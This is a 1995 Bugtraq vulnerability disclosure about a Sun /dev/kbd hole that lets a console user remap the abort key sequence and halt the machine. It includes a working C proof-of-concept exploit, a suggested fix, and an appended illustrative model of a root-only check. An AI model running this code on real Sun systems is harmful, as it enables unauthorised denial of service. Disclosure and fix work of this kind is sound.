Bugtraq mailing list archives

little hole on Suns concerning /dev/kbd


From: Arfst.Ludwig () luxor in-berlin de (Arfst Ludwig)
Date: Sat, 2 Dec 1995 23:56:03 +0100


Hi!

On a SUN with SunOS 4.1.* or Solaris 2.* any user logged on at the console can
remap the abort key sequence (the key sequence to enter the boot monitor).
Impact: Any arbitrary key sequence can enter the boot monitor and halt
the machine.

The abort key sequence can easily be remapped, e.g. to shift_l a. Instead of
getting an `A' the user gets the boot monitor prompt:

8<--------------------------- cut here ----------------------------
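#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sundev/kbd.h>
#include <sundev/kbio.h>

int main()
{
  int fd;
  struct kiockey k;

  fd = open("/dev/kbd", O_RDWR);
  if (fd < 0) {
    perror("/dev/kbd");
    return (1);
  }
  /* first key station of the abort sequence */
  k.kio_tablemask = KIOCABORT1;
  k.kio_station = 0x6e;
  ioctl(fd, KIOCSETKEY, &k);
  /* second key station of the abort sequence */
  k.kio_tablemask = KIOCABORT2;
  k.kio_station = 0x4d;
  ioctl(fd, KIOCSETKEY, &k);
  close(fd);
  return (0);
}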
8<--------------------------- cut here ----------------------------

Is there a fix possible? /dev/kbd should be readable to the user logged
in at the console. Redefining the abort sequence should only be allowed
via a new device, e.g. /dev/kbdctl, which is accessible only by root.

Cheers, Arfst
______________________________________________________________________
  __
 (00)   Arfst Ludwig
  \`\/  E-Mail: Arfst.Ludwig () luxor in-berlin de
   ""   carpe diem
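
Added example, not part of the original post and not Sun's driver code: a small user-space model of the privilege split the post asks for, written as a check inside the set-key handler rather than as a separate /dev/kbdctl device. All model_* names, the MODEL_* constants and the default abort1 station are constructed for illustration; 0x6e and 0x4d are the stations used in the post.

```c
#include <errno.h>
#include <stdio.h>

/* Stand-in constants for this model; not the values from <sundev/kbd.h>. */
#define MODEL_ABORT1 (-1)    /* pseudo table: first abort key station  */
#define MODEL_ABORT2 (-2)    /* pseudo table: second abort key station */
#define MODEL_NKEYS  128

struct model_setkey {        /* hypothetical analogue of struct kiockey */
    int tablemask;           /* ordinary table, or MODEL_ABORT1/2 */
    int station;             /* key station (position on the keyboard) */
    int entry;               /* new translation; unused for abort tables */
};

struct model_kbd {
    int abort1, abort2;      /* stations that together enter the monitor */
    int keymap[MODEL_NKEYS]; /* ordinary translation table */
};

void model_kbd_init(struct model_kbd *kb)
{
    kb->abort1 = 0x01;       /* constructed default, not from the post */
    kb->abort2 = 0x4d;
    for (int i = 0; i < MODEL_NKEYS; i++)
        kb->keymap[i] = i;
}

/* Set-key handler with the privilege split; returns 0 or an errno value. */
int model_kbd_setkey(struct model_kbd *kb, const struct model_setkey *k, int uid)
{
    if (k->station < 0 || k->station >= MODEL_NKEYS)
        return EINVAL;
    if (k->tablemask == MODEL_ABORT1 || k->tablemask == MODEL_ABORT2) {
        if (uid != 0)
            return EPERM;    /* console user may not move the abort keys */
        if (k->tablemask == MODEL_ABORT1) kb->abort1 = k->station;
        else kb->abort2 = k->station;
        return 0;
    }
    kb->keymap[k->station] = k->entry;  /* ordinary remap stays allowed */
    return 0;
}

int main(void)
{
    struct model_kbd kb;
    struct model_setkey req = { MODEL_ABORT1, 0x6e, 0 };
    model_kbd_init(&kb);
    int rc = model_kbd_setkey(&kb, &req, 1000);
    printf("uid 1000: rc=%d abort1=0x%02x\n", rc, kb.abort1);
    return 0;
}
```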


